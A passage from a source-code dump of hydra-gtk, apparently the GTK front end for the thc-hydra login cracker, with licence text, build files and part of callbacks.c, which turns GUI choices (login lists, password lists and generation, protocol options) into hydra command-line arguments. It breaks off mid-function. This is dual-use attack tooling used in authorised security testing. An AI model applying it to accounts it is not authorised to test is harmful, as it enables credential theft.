choose any version ever published by the Free Software\nFoundation.\n\n 10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission. For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this. Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n\t\t\t NO WARRANTY\n\n 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n\t\t END OF TERMS AND CONDITIONS\n\f\n\t How to Apply These Terms to Your New Programs\n\n If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n To do so, attach the following notices to the program. It is safest\nto attach them to the start of each source file to most effectively\nconvey the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n \n Copyright (C) \n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this\nwhen it starts in an interactive mode:\n\n Gnomovision version 69, Copyright (C) year name of author\n Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n This is free software, and you are welcome to redistribute it\n under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License. Of course, the commands you use may\nbe called something other than `show w' and `show c'; they could even be\nmouse-clicks or menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your\nschool, if any, to sign a \"copyright disclaimer\" for the program, if\nnecessary. Here is a sample; alter the names:\n\n Yoyodyne, Inc., hereby disclaims all copyright interest in the program\n `Gnomovision' (which makes passes at compilers) written by James Hacker.\n\n , 1 April 1989\n Ty Coon, President of Vice\n\nThis General Public License does not permit incorporating your program into\nproprietary programs. If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary. If this is what you want to do, use the GNU Library General\nPublic License instead of this License.\n" }, { "path": "hydra-gtk/ChangeLog", "content": "" }, { "path": "hydra-gtk/Makefile.am", "content": "## Process this file with automake to produce Makefile.in\n\nSUBDIRS = src\n\nEXTRA_DIST = \\\n\tautogen.sh \\\n\txhydra.glade \\\n\txhydra.gladep\n\ninstall-data-local:\n\t@$(NORMAL_INSTALL)\n\tif test -d $(srcdir)/pixmaps; then \\\n\t $(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \\\n\t for pixmap in $(srcdir)/pixmaps/*; do \\\n\t if test -f $$pixmap; then \\\n\t $(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \\\n\t fi \\\n\t done \\\n\tfi\n\ndist-hook:\n\tif test -d pixmaps; then \\\n\t mkdir $(distdir)/pixmaps; \\\n\t for pixmap in pixmaps/*; do \\\n\t if test -f $$pixmap; then \\\n\t cp -p $$pixmap $(distdir)/pixmaps; \\\n\t fi \\\n\t done \\\n\tfi\n\n" }, { "path": "hydra-gtk/NEWS", "content": "" }, { "path": "hydra-gtk/README", "content": "Hydra-GTK\n\nGtk+3 frontend for thc-hydra\n\nTo install just do a:\n\n```\n./autogen.sh\nmake\nsu root\nmake install\n```\n\nEasy at it can be... You need thc-hydra installed to make this work.\nThis is my second gtk program, so I am waiting for a lot of patches :)\nMail them to snakebyte@gmx.de\n" }, { "path": "hydra-gtk/README-autoconf", "content": "Installation Instructions\n*************************\n\nBasic Installation\n==================\n\n The following shell commands:\n\n test -f configure || ./bootstrap\n ./configure\n make\n make install\n\nshould configure, build, and install this package. The first line,\nwhich bootstraps, is intended for developers; when building from\ndistribution tarballs it does nothing and can be skipped. A package\nmight name the bootstrapping script differently; if the name is\n‘autogen.sh’, for example, the first line should say ‘./autogen.sh’\ninstead of ‘./bootstrap’.\n\n The following more-detailed instructions are generic; see the\n‘README’ file for instructions specific to this package. Some packages\nprovide this ‘INSTALL’ file but do not implement all of the features\ndocumented below. The lack of an optional feature in a given package is\nnot necessarily a bug. More recommendations for GNU packages can be\nfound in the GNU Coding Standards.\n\n Many packages have scripts meant for developers instead of ordinary\nbuilders, as they may use developer tools that are less commonly\ninstalled, or they may access the network, which has privacy\nimplications. These scripts attempt to bootstrap by building the\n‘configure’ script and related files, possibly using developer tools or\nthe network. Because the output of bootstrapping is system-independent,\nit is normally run by a package developer so that its output can be put\ninto the distribution tarball and ordinary builders and users need not\nbootstrap. Some packages have commands like ‘./autopull.sh’ and\n‘./autogen.sh’ that you can run instead of ‘./bootstrap’, for more\nfine-grained control over bootstrapping.\n\n The ‘configure’ script attempts to guess correct values for various\nsystem-dependent variables used during compilation. It uses those\nvalues to create a ‘Makefile’ in each directory of the package. It may\nalso create one or more ‘.h’ files containing system-dependent\ndefinitions. Finally, it creates a script ‘config.status’ that you can\nrun in the future to recreate the current configuration, and a file\n‘config.log’ containing output useful for debugging ‘configure’.\n\n It can also use an optional file (typically called ‘config.cache’ and\nenabled with ‘--cache-file=config.cache’ or simply ‘-C’) that saves the\nresults of its tests to speed up reconfiguring. Caching is disabled by\ndefault to prevent problems with accidental use of stale cache files.\n\n If you need to do unusual things to compile the package, please try\nto figure out how ‘configure’ could check whether to do them, and mail\ndiffs or instructions to the address given in the ‘README’ so they can\nbe considered for the next release. If you are using the cache, and at\nsome point ‘config.cache’ contains results you don’t want to keep, you\nmay remove or edit it.\n\n The ‘autoconf’ program generates ‘configure’ from the file\n‘configure.ac’. Normally you should edit ‘configure.ac’ instead of\nediting ‘configure’ directly.\n\n The simplest way to compile this package is:\n\n 1. ‘cd’ to the directory containing the package’s source code.\n\n 2. If this is a developer checkout and file ‘configure’ does not yet\n exist, run the bootstrapping script (typically ‘./bootstrap’ or\n ‘./autogen.sh’) to bootstrap and create the file. You may need\n special developer tools and network access to bootstrap, and the\n network access may have privacy implications.\n\n 3. Type ‘./configure’ to configure the package for your system. This\n might take a while. While running, ‘configure’ prints messages\n telling which features it is checking for.\n\n 4. Type ‘make’ to compile the package.\n\n 5. Optionally, type ‘make check’ to run any self-tests that come with\n the package, generally using the just-built uninstalled binaries.\n\n 6. Type ‘make install’ to install the programs and any data files and\n documentation. When installing into a prefix owned by root, it is\n recommended that the package be configured and built as a regular\n user, and only the ‘make install’ phase executed with root\n privileges.\n\n 7. Optionally, type ‘make installcheck’ to repeat any self-tests, but\n this time using the binaries in their final installed location.\n This target does not install anything. Running this target as a\n regular user, particularly if the prior ‘make install’ required\n root privileges, verifies that the installation completed\n correctly.\n\n 8. You can remove the program binaries and object files from the\n source code directory by typing ‘make clean’. To also remove the\n files that ‘configure’ created (so you can compile the package for\n a different kind of computer), type ‘make distclean’. There is\n also a ‘make maintainer-clean’ target, but that is intended mainly\n for the package’s developers. If you use it, you may have to\n bootstrap again.\n\n 9. If the package follows the GNU Coding Standards, you can type ‘make\n uninstall’ to remove the installed files.\n\nInstallation Prerequisites\n==========================\n\n Installation requires a POSIX-like environment with a shell and at\nleast the following standard utilities:\n\n awk cat cp diff echo expr false ls mkdir mv printf pwd rm rmdir sed\n sort test tr\n\nThis package’s installation may need other standard utilities such as\n‘grep’, ‘make’, ‘sleep’ and ‘touch’, along with compilers like ‘gcc’.\n\nCompilers and Options\n=====================\n\n Some systems require unusual options for compilation or linking that\nthe ‘configure’ script does not know about. Run ‘./configure --help’\nfor details on some of the pertinent environment variables.\n\n You can give ‘configure’ initial values for configuration parameters\nby setting variables in the command line or in the environment. Here is\nan example:\n\n ./configure CC=gcc CFLAGS=-g LIBS=-lposix\n\n See “Defining Variables” for more details.\n\nCompiling For Multiple Architectures\n====================================\n\n You can compile the package for more than one kind of computer at the\nsame time, by placing the object files for each system in their own\ndirectory. To do this, you can use GNU ‘make’. ‘cd’ to the directory\nwhere you want the object files and executables to go and run the\n‘configure’ script. ‘configure’ automatically checks for the source\ncode in the directory that ‘configure’ is in and in ‘..’. This is known\nas a “VPATH” build.\n\n With a non-GNU ‘make’, it is safer to compile the package for one\nsystem at a time in the source code directory. After you have installed\nthe package for one system, use ‘make distclean’ before reconfiguring\nfor another system.\n\n Some platforms, notably macOS, support “fat” or “universal” binaries,\nwhere a single binary can execute on different architectures. On these\nplatforms you can configure and compile just once, with options specific\nto that platform.\n\nInstallation Names\n==================\n\n By default, ‘make install’ installs the package’s commands under\n‘/usr/local/bin’, include files under ‘/usr/local/include’, etc. You\ncan specify an installation prefix other than ‘/usr/local’ by giving\n‘configure’ the option ‘--prefix=PREFIX’, where PREFIX must be an\nabsolute file name.\n\n You can specify separate installation prefixes for\narchitecture-specific files and architecture-independent files. If you\npass the option ‘--exec-prefix=PREFIX’ to ‘configure’, the package uses\nPREFIX as the prefix for installing programs and libraries.\nDocumentation and other data files still use the regular prefix.\n\n In addition, if you use an unusual directory layout you can give\noptions like ‘--bindir=DIR’ to specify different values for particular\nkinds of files. Run ‘configure --help’ for a list of the directories\nyou can set and what kinds of files go in them. In general, the default\nfor these options is expressed in terms of ‘${prefix}’, so that\nspecifying just ‘--prefix’ will affect all of the other directory\nspecifications that were not explicitly provided.\n\n The most portable way to affect installation locations is to pass the\ncorrect locations to ‘configure’; however, many packages provide one or\nboth of the following shortcuts of passing variable assignments to the\n‘make install’ command line to change installation locations without\nhaving to reconfigure or recompile.\n\n The first method involves providing an override variable for each\naffected directory. For example, ‘make install\nprefix=/alternate/directory’ will choose an alternate location for all\ndirectory configuration variables that were expressed in terms of\n‘${prefix}’. Any directories that were specified during ‘configure’,\nbut not in terms of ‘${prefix}’, must each be overridden at install time\nfor the entire installation to be relocated. The approach of makefile\nvariable overrides for each directory variable is required by the GNU\nCoding Standards, and ideally causes no recompilation. However, some\nplatforms have known limitations with the semantics of shared libraries\nthat end up requiring recompilation when using this method, particularly\nnoticeable in packages that use GNU Libtool.\n\n The second method involves providing the ‘DESTDIR’ variable. For\nexample, ‘make install DESTDIR=/alternate/directory’ will prepend\n‘/alternate/directory’ before all installation names. The approach of\n‘DESTDIR’ overrides is not required by the GNU Coding Standards, and\ndoes not work on platforms that have drive letters. On the other hand,\nit does better at avoiding recompilation issues, and works well even\nwhen some directory options were not specified in terms of ‘${prefix}’\nat ‘configure’ time.\n\nOptional Features\n=================\n\n If the package supports it, you can cause programs to be installed\nwith an extra prefix or suffix on their names by giving ‘configure’ the\noption ‘--program-prefix=PREFIX’ or ‘--program-suffix=SUFFIX’.\n\n Some packages pay attention to ‘--enable-FEATURE’ and\n‘--disable-FEATURE’ options to ‘configure’, where FEATURE indicates an\noptional part of the package. They may also pay attention to\n‘--with-PACKAGE’ and ‘--without-PACKAGE’ options, where PACKAGE is\nsomething like ‘gnu-ld’. ‘./configure --help’ should mention the\n‘--enable-...’ and ‘--with-...’ options that the package recognizes.\n\n Some packages offer the ability to configure how verbose the\nexecution of ‘make’ will be. For these packages, running ‘./configure\n--enable-silent-rules’ sets the default to minimal output, which can be\noverridden with ‘make V=1’; while running ‘./configure\n--disable-silent-rules’ sets the default to verbose, which can be\noverridden with ‘make V=0’.\n\nSpecifying a System Type\n========================\n\n By default ‘configure’ builds for the current system. To create\nbinaries that can run on a different system type, specify a\n‘--host=TYPE’ option along with compiler variables that specify how to\ngenerate object code for TYPE. For example, to create binaries intended\nto run on a 64-bit ARM processor:\n\n ./configure --host=aarch64-linux-gnu \\\n CC=aarch64-linux-gnu-gcc \\\n CXX=aarch64-linux-gnu-g++\n\nIf done on a machine that can execute these binaries (e.g., via\n‘qemu-aarch64’, ‘$QEMU_LD_PREFIX’, and Linux’s ‘binfmt_misc’\ncapability), the build behaves like a native build. Otherwise it is a\ncross-build: ‘configure’ will make cross-compilation guesses instead of\nrunning test programs, and ‘make check’ will not work.\n\n A system type can either be a short name like ‘mingw64’, or a\ncanonical name like ‘x86_64-pc-linux-gnu’. Canonical names have the\nform CPU-COMPANY-SYSTEM where SYSTEM is either OS or KERNEL-OS. To\ncanonicalize and validate a system type, you can run the command\n‘config.sub’, which is often squirreled away in a subdirectory like\n‘build-aux’. For example:\n\n $ build-aux/config.sub arm64-linux\n aarch64-unknown-linux-gnu\n $ build-aux/config.sub riscv-lnx\n Invalid configuration 'riscv-lnx': OS 'lnx' not recognized\n\nYou can look at the ‘config.sub’ file to see which types are recognized.\nIf the file is absent, this package does not need the system type.\n\n If ‘configure’ fails with the diagnostic “cannot guess build type”.\n‘config.sub’ did not recognize your system’s type. In this case, first\nfetch the newest versions of these files from the GNU config package\n(https://savannah.gnu.org/projects/config). If that fixes things,\nplease report it to the maintainers of the package containing\n‘configure’. Otherwise, you can try the configure option ‘--build=TYPE’\nwhere TYPE comes close to your system type; also, please report the\nproblem to .\n\n For more details about configuring system types, see the Autoconf\ndocumentation.\n\nSharing Defaults\n================\n\n If you want to set default values for ‘configure’ scripts to share,\nyou can create a site shell script called ‘config.site’ that gives\ndefault values for variables like ‘CC’, ‘cache_file’, and ‘prefix’.\n‘configure’ looks for ‘PREFIX/share/config.site’ if it exists, then\n‘PREFIX/etc/config.site’ if it exists. Or, you can set the\n‘CONFIG_SITE’ environment variable to the location of the site script.\nA warning: not all ‘configure’ scripts look for a site script.\n\nDefining Variables\n==================\n\n Variables not defined in a site shell script can be set in the\nenvironment passed to ‘configure’. However, some packages may run\nconfigure again during the build, and the customized values of these\nvariables may be lost. In order to avoid this problem, you should set\nthem in the ‘configure’ command line, using ‘VAR=value’. For example:\n\n ./configure CC=/usr/local2/bin/gcc\n\ncauses the specified ‘gcc’ to be used as the C compiler (unless it is\noverridden in the site shell script).\n\nUnfortunately, this technique does not work for ‘CONFIG_SHELL’ due to an\nAutoconf limitation. Until the limitation is lifted, you can use this\nworkaround:\n\n CONFIG_SHELL=/bin/bash ./configure CONFIG_SHELL=/bin/bash\n\n‘configure’ Invocation\n======================\n\n ‘configure’ recognizes the following options to control how it\noperates.\n\n‘--help’\n‘-h’\n Print a summary of all of the options to ‘configure’, and exit.\n\n‘--help=short’\n‘--help=recursive’\n Print a summary of the options unique to this package’s\n ‘configure’, and exit. The ‘short’ variant lists options used only\n in the top level, while the ‘recursive’ variant lists options also\n present in any nested packages.\n\n‘--version’\n‘-V’\n Print the version of Autoconf used to generate the ‘configure’\n script, and exit.\n\n‘--cache-file=FILE’\n Enable the cache: use and save the results of the tests in FILE,\n traditionally ‘config.cache’. FILE defaults to ‘/dev/null’ to\n disable caching.\n\n‘--config-cache’\n‘-C’\n Alias for ‘--cache-file=config.cache’.\n\n‘--srcdir=DIR’\n Look for the package’s source code in directory DIR. Usually\n ‘configure’ can determine that directory automatically.\n\n‘--prefix=DIR’\n Use DIR as the installation prefix. See “Installation Names” for\n more details, including other options available for fine-tuning the\n installation locations.\n\n‘--host=TYPE’\n Build binaries for system TYPE. See “Specifying a System Type”.\n\n‘--enable-FEATURE’\n‘--disable-FEATURE’\n Enable or disable the optional FEATURE. See “Optional Features”.\n\n‘--with-PACKAGE’\n‘--without-PACKAGE’\n Use or omit PACKAGE when building. See “Optional Features”.\n\n‘--quiet’\n‘--silent’\n‘-q’\n Do not print messages saying which checks are being made. To\n suppress all normal output, redirect it to ‘/dev/null’ (any error\n messages will still be shown).\n\n‘--no-create’\n‘-n’\n Run the configure checks, but stop before creating any output\n files.\n\n‘configure’ also recognizes several environment variables, and accepts\nsome other, less widely useful, options. Run ‘configure --help’ for\nmore details.\n\nCopyright notice\n================\n\n Copyright © 1994–1996, 1999–2002, 2004–2017, 2020–2025 Free Software\nFoundation, Inc.\n\n Copying and distribution of this file, with or without modification,\nare permitted in any medium without royalty provided the copyright\nnotice and this notice are preserved. This file is offered as-is,\nwithout warranty of any kind.\n" }, { "path": "hydra-gtk/autogen.sh", "content": "#!/bin/sh\n# Run this to generate all the initial makefiles, etc.\ntest -n \"$srcdir\" || srcdir=$(dirname \"$0\")\ntest -n \"$srcdir\" || srcdir=.\n\nolddir=$(pwd)\n\ncd $srcdir\n\n(test -f configure.ac) || {\n echo \"*** ERROR: Directory '$srcdir' does not look like the top-level project directory ***\"\n exit 1\n}\n\n# shellcheck disable=SC2016\nPKG_NAME=$(autoconf --trace 'AC_INIT:$1' configure.ac)\n\nif [ \"$#\" = 0 -a \"x$NOCONFIGURE\" = \"x\" ]; then\n echo \"*** WARNING: I am going to run 'configure' with no arguments.\" >&2\n echo \"*** If you wish to pass any to it, please specify them on the\" >&2\n echo \"*** '$0' command line.\" >&2\n echo \"\" >&2\nfi\n\nautoreconf --verbose --force --install || exit 1\n\ncd \"$olddir\"\nif [ \"$NOCONFIGURE\" = \"\" ]; then\n $srcdir/configure \"$@\" || exit 1\n\n if [ \"$1\" = \"--help\" ]; then\n exit 0\n else\n echo \"Now type 'make' to compile $PKG_NAME\" || exit 1\n fi\nelse\n echo \"Skipping configure process.\"\nfi\n" }, { "path": "hydra-gtk/configure.ac", "content": "dnl Process this file with autoconf to produce a configure script.\n\nAC_INIT([xhydra],[0.1])\nAC_CONFIG_HEADERS([config.h])\nAM_INIT_AUTOMAKE\n\nAC_PROG_CC\n\npkg_modules=\"gtk+-3.0 >= 3.24.24\"\nPKG_CHECK_MODULES(PACKAGE, [$pkg_modules])\nAC_SUBST(PACKAGE_CFLAGS)\nAC_SUBST(PACKAGE_LIBS)\n\nAC_CONFIG_FILES([\nMakefile\nsrc/Makefile\n])\nAC_OUTPUT\n" }, { "path": "hydra-gtk/make_xhydra.sh", "content": "#!/bin/sh\n\nset -e\n\necho \"Trying to compile xhydra now (hydra gtk gui)\"\nNOCONFIGURE=1 ./autogen.sh\n./configure\nmake\ncp -v src/xhydra ..\necho \"The GTK GUI is ready, type \\\"./xhydra\\\" to start\"\n" }, { "path": "hydra-gtk/src/Makefile.am", "content": "## Process this file with automake to produce Makefile.in\n\n# Note: Use no-deprecated-declarations until someone finishes the Gtk3 port,\n# ie. move from GtkTable to GtkGrid, and a few other details.\n\nAM_CPPFLAGS = \\\n\t-Wno-deprecated-declarations \\\n\t-DPACKAGE_DATA_DIR=\\\"\"$(datadir)\"\\\" \\\n\t-DPACKAGE_LOCALE_DIR=\\\"\"$(prefix)/$(DATADIRNAME)/locale\"\\\" \\\n\t@PACKAGE_CFLAGS@\n\nbin_PROGRAMS = xhydra\n\nxhydra_SOURCES = \\\n\tmain.c \\\n\tsupport.c support.h \\\n\tinterface.c interface.h \\\n\tcallbacks.c callbacks.h\n\nxhydra_LDADD = @PACKAGE_LIBS@\n\n" }, { "path": "hydra-gtk/src/callbacks.c", "content": "\n/*\n * This file handles all that needs to be done...\n * Some stuff is stolen from gcombust since I never used pipes... ok, i\n * only used them in reallife :)\n */\n\n#ifdef HAVE_CONFIG_H\n#include \n#endif\n\n#include \n\n#include \"callbacks.h\"\n#include \"interface.h\"\n#include \"support.h\"\n\n#include \n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n#include \n#include \n\nint hydra_pid = 0;\n\nchar port[10];\nchar tasks[10];\nchar timeout[10];\nchar smbparm[128];\nchar sapr3id[4];\nchar passLoginNull[4];\n\n#define BUF_S 1024\n\nvoid hydra_select_file(GtkEntry *widget, char *text) {\n#ifdef GTK_TYPE_FILE_CHOOSER\n GtkWidget *dialog;\n char *filename;\n\n dialog = gtk_file_chooser_dialog_new(text, (GtkWindow *)wndMain, GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_OPEN, GTK_RESPONSE_ACCEPT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, NULL);\n\n if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_ACCEPT) {\n filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog));\n gtk_entry_set_text(widget, filename);\n g_free(filename);\n }\n gtk_widget_destroy(dialog);\n#endif\n}\n\nint hydra_get_options(char *options[]) {\n /* get the stuff from the gtk entries... */\n int i = 1;\n GtkWidget *widget;\n GtkWidget *widget2;\n int j;\n gchar *tmp;\n GString *a;\n\n options[0] = HYDRA_BIN;\n\n /* get the port */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"spnPort\");\n j = gtk_spin_button_get_value_as_int((GtkSpinButton *)widget);\n if (j != 0) {\n snprintf(port, 10, \"%d\", j);\n options[i++] = \"-s\";\n options[i++] = port;\n }\n\n /* prefer ipv6 */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkIPV6\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-6\";\n }\n\n /* use SSL? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkSSL\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-S\";\n }\n\n /* use old SSL? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkOldSSL\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-O\";\n }\n\n /* be verbose? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkVerbose\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-v\";\n }\n\n /* show attempts */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkAttempts\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-V\";\n }\n\n /* debug mode? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkDebug\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-d\";\n }\n\n /* COMPLETE HELP */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkCompleteHelp\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-h\";\n }\n\n /* Service Module Usage Details */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkServiceDetails\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-U\";\n }\n\n /* use colon separated list? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkColon\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-C\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entColonFile\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else {\n /* disable usernames */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkDisUser\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n } else {\n /* get the username, or username list */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioUsername1\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-l\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entUsername\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n } else {\n options[i++] = \"-L\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entUsernameFile\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n }\n\n /* get the pass, pass list, or generate */\n /* The \"generate\" button was implemented by Petar Kaleychev */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioPass1\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-p\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entPass\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioPass2\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-P\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entPassFile\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n widget = lookup_widget(GTK_WIDGET(wndMain), \"radioGenerate\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-x\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entGeneration\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n }\n }\n\n /* empty passes / login as pass / reversed login? */\n memset(passLoginNull, 0, 4);\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkPassNull\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n passLoginNull[0] = 'n';\n }\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkPassLogin\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n if (passLoginNull[0] == 0) {\n passLoginNull[0] = 's';\n } else {\n passLoginNull[1] = 's';\n }\n }\n /* The \"Try reversed login\" button was implemented by Petar Kaleychev */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkPassReverse\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n if (passLoginNull[0] == 0) {\n passLoginNull[0] = 'r';\n } else if (passLoginNull[1] == 0) {\n passLoginNull[1] = 'r';\n } else {\n passLoginNull[2] = 'r';\n }\n }\n if (passLoginNull[0] != 0) {\n options[i++] = \"-e\";\n options[i++] = passLoginNull;\n }\n\n /* #of tasks */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"spnTasks\");\n j = gtk_spin_button_get_value_as_int((GtkSpinButton *)widget);\n if (j != 40) {\n snprintf(tasks, 10, \"%d\", j);\n options[i++] = \"-t\";\n options[i++] = tasks;\n }\n\n /* timeout */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"spnTimeout\");\n j = gtk_spin_button_get_value_as_int((GtkSpinButton *)widget);\n if (j != 30) {\n snprintf(timeout, 10, \"%d\", j);\n options[i++] = \"-w\";\n options[i++] = timeout;\n }\n\n /* loop around users? */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkUsernameLoop\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-u\";\n }\n\n /* exit after first found pair? */\n /* per host */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkExitf\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-f\";\n }\n /* global */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkExitF\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-F\";\n }\n\n /* Do not print messages about connection errors */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkNoErr\");\n if (gtk_toggle_button_get_active((GtkToggleButton *)widget)) {\n options[i++] = \"-q\";\n }\n\n /* get additional parameters */\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entProtocol\");\n tmp = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n if (!strncmp(tmp, \"http-proxy\", 10)) {\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entHTTPProxyURL\");\n options[i++] = \"-m\";\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strncmp(tmp, \"http-\", 5) || !strncmp(tmp, \"https-\", 6)) {\n options[i++] = \"-m\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entHTTPURL\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"cisco-enable\")) {\n options[i++] = \"-m\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entCiscoPass\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"ldap3-crammd5\")) {\n options[i++] = \"-m\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entLDAPDN\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"ldap3-digestmd5\")) {\n options[i++] = \"-m\";\n widget = lookup_widget(GTK_WIDGET(wndMain), \"entLDAPDN\");\n options[i++] = (char *)gtk_entry_get_text((GtkEntry *)widget);\n\n } else if (!strcmp(tmp, \"smb\")) {\n memset(smbparm, 0, sizeof(smbparm));\n\n widget = lookup_widget(GTK_WIDGET(wndMain), \"chkDomain\");\n widget2 